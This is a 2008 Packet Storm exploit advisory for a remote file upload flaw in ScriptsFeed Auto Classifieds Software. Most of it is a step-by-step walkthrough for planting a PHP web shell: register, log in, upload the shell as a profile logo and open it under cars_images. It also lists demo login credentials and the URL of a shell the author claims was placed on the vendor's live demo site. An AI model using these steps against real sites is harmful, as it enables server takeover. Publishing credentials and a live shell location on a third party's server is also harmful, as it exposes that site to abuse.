sfacs-upload.txt

2008-11-14T00:00:00
ID PACKETSTORM:71948
Type packetstorm
Reporter ZoRLu
Modified 2008-11-14T00:00:00

Description

                                        
                                            `[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 13.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]  
[~] my bug number now: 39  
[~]  
[~] my target bug number: 100  
[~]  
[~] -----------------------------------------------------------  
  
  
Exploit:  
  
http://localhost/script/cars_images/[id]_logo_your_shell.php  
  
you register to site   
  
register: http://localhost/script/register.php  
  
after you login to site  
  
login: http://localhost/script/login.php  
  
more after you go profile edit  
  
profile: http://localhost/script/profile.php  
  
and you upload your_shell.php right click to your logo and select properties copy link  
  
paste your explorer go your_shell.php  
  
your_shell.php path:  
  
http://localhost/script/cars_images/[id]_logo_your_shell.php  
  
  
  
rfu for demo:  
  
user: zorlu  
  
passwd: zorlu1  
  
shell path:  
  
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`